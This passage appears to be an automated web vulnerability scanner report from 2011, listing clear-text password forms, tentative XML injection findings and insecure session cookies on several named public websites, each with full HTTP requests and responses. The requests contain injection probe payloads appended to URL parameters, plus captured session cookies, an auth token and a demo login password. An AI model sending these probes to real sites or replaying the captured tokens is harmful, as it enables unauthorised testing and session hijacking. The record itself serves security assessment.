<!DOCTYPE html><html><head><title>Quora</title><script src="http://d1zlmuwse3cba4.cloudfront.net/-8d444a36039c0a9a.js"></script><script>require.base="http://d1zlmuwse3cba4.cloudfront.net/-f79f52c66f01
...[SNIP]...
<div class="w3_5 p1"><form class="row w2_5 col inline_login_form" method="POST" id="__w2_qd0Z6ls_login_form"><div class="form_inputs">
...[SNIP]...
</label><input class="text" group="__w2_qd0Z6ls_interaction" type="password" name="password" w2cid="qd0Z6ls" id="__w2_qd0Z6ls_password" /><span class="hidden input_validation_error_text" id="__w2_qd0Z6ls_incorrect_password_error">
...[SNIP]...

9.14. http://www.quora.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quora.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.quora.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m-b=KnQltoIvGU-zgVNet6ZeBQ==; m-tz=300; __utmz=261736717.1305305580.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261736717.2135279484.1305305580.1305305580.1305305580.1; m-s=elrhGUM55MQtNfHFxEBqeA==

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.2
Date: Sun, 15 May 2011 11:19:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Length: 17438

<!DOCTYPE html><html><head><title>Quora</title><script src="http://d1zlmuwse3cba4.cloudfront.net/-8d444a36039c0a9a.js"></script><script>require.base="http://d1zlmuwse3cba4.cloudfront.net/-f79f52c66f01
...[SNIP]...
<div class="col w4 signup_form"><form class="w3" action="/signup/signup_POST" method="POST" id="__w2_URE5w9W_form"><input type="hidden" name="formkey" value="0e86cb9a6f72d403ba7cae637e739448" />
...[SNIP]...
</label><input class="text" group="__w2_URE5w9W_interaction" type="password" name="password" w2cid="URE5w9W" id="__w2_URE5w9W_password" /><div class="hidden __w2_PcX3xO7_invalid input_validation_error_text" id="__w2_PcX3xO7_invalid_message">
...[SNIP]...

9.15. http://www.townnews365.com/users/manage/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /users/manage/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /users/manage/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.8.10.1305412213

Response

HTTP/1.1 403 Forbidden
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4007076
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:34:06 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4603
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp13
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 38967


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...
<noscript>
<form action="/users/login/" method="post">
<p>
...[SNIP]...
</label>
<input type="password" name="password" id="password" size="30" /></p>
...[SNIP]...

10. XML injection  previous  next
There are 9 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


10.1. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.vccircle.com%2F500%2Fnews%2Fintel-capital-puts-18m-in-new-follow-on-investments%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 14 May 2011 11:09:16 -0700
Pragma:
X-FB-Rev: 378279
X-FB-Server: 10.32.6.111
X-Cnection: close
Date: Sat, 14 May 2011 18:07:16 GMT
Content-Length: 836

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

10.2. http://cwe.mitre.org/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/main.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/main.css?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:01 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.3. http://cwe.mitre.org/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/main.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/main.css]]>>?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:03 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.4. http://cwe.mitre.org/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/print.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/print.css?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:03 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.5. http://cwe.mitre.org/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/print.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/print.css]]>>?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:05 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.6. http://cwe.mitre.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=79487238.1305399271.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79487238.1675907642.1305399271.1305399271.1305399271.1; __utmc=79487238; __utmb=79487238.1.10.1305399271

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:57:40 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.7. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [tem parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The tem parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the tem parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=7_0_5&qc=9660&tem=patni]]>> HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=159336229; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 14:00:14 GMT
Content-Length: 65297
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
l; UNIX- Basic Commands, Understanding and writing Script, FTP, Remote Login etc.
&bull; Constructing queries and to extract data from Multiple tables.
&bull; XML-Understanding and experience on XML Browsing, Fixing and ...</em>
...[SNIP]...

10.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1305396256206&count=none&lang=en&text=Intel%20Capital%20Puts%20%2418M%20In%20New%20%26%20Follow-On%20Investments%20%7C%20VCCircle&url=http%3A%2F%2Fwww.vccircle.com%2F500%2Fnews%2Fintel-capital-puts-18m-in-new-follow-on-investments HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sat, 14 May 2011 18:04:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>73949B706B0655FD</Reque
...[SNIP]...

10.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1305396256206&count=none&lang=en&text=Intel%20Capital%20Puts%20%2418M%20In%20New%20%26%20Follow-On%20Investments%20%7C%20VCCircle&url=http%3A%2F%2Fwww.vccircle.com%2F500%2Fnews%2Fintel-capital-puts-18m-in-new-follow-on-investments HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sat, 14 May 2011 18:04:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>94FE412D4002B7C4</Reque
...[SNIP]...

11. SSL cookie without secure flag set  previous  next
There are 9 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


11.1. https://asia.citi.com/india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://asia.citi.com
Path:   /india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm HTTP/1.1
Host: asia.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:12:47 GMT
Server:
Content-Length: 42809
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDQCBCQBSS=DOOKPDICBCGKMBFPOJIICLNM; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Application for IndianOil Citibank Titanium Credit Card</title>
<meta ht
...[SNIP]...

11.2. https://grs.tcs.com/DTOnline/CareersDesign/Jsps/EntryLevel.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://grs.tcs.com
Path:   /DTOnline/CareersDesign/Jsps/EntryLevel.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DTOnline/CareersDesign/Jsps/EntryLevel.jsp HTTP/1.1
Host: grs.tcs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 14 May 2011 14:13:02 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=BSvHNTNQ1KvH5hJpk201nJqW5HZW7nLKBhDMYcy743zkTBSfnb3n!-1108058746; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<HTML>
<H
...[SNIP]...

11.3. https://townnews365-dot-com.bloxcms.com/users/login/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://townnews365-dot-com.bloxcms.com
Path:   /users/login/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /users/login/ HTTP/1.1
Host: townnews365-dot-com.bloxcms.com
Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
Content-Length: 130
Cache-Control: max-age=0
Origin: http://www.townnews365.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

referer_url=%2Fuser-generated_solutions%2Fuser_account_contributions%2F%3Flogin_success%3Dtrue&username=Demo+User&password=letmein

Response

HTTP/1.1 302 Found
Server: WWW
Cache-Control: private, no-cache, no-store, max-age=0
X-TNCMS-Memory-Usage: 2944284
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:33:06 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://www.townnews365.com/users/login-success/?referer_url=%2Fuser-generated_solutions%2Fuser_account_contributions%2F%3Flogin_success%3Dtrue&user=6c94bd0e-d884-11de-85c7-001a4bcf887a&cfsv=0.31221200+1305412386
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.056
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: tncms-services=deleted; expires=Fri, 14-May-2010 22:33:05 GMT; path=/
Set-Cookie: tncms-authtoken=AQES8BH8xo3WJMBncGd0zzmJlLbCt1KIAXN3wGZP6DPMgbFe91l6xrWPNXxcv3Xuvh5LX1cTiKiAVWa1Fpr6n70; path=/
Set-Cookie: tncms-screenname=Demo+User; expires=Tue, 13-May-2014 22:33:06 GMT; path=/
Set-Cookie: tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; expires=Tue, 13-May-2014 22:33:06 GMT; path=/
X-Cache-Info: not cacheable; request wasn't a GET or HEAD
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp9
Content-Length: 857

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<base href="https://townnews365-dot-com.bloxcms.com/content/tncms/live/" />

<title>301 Moved Permanently</title>
</head>
<body>
<scr
...[SNIP]...

11.4. https://login.naukri.com/nLogin/Login.php  previous<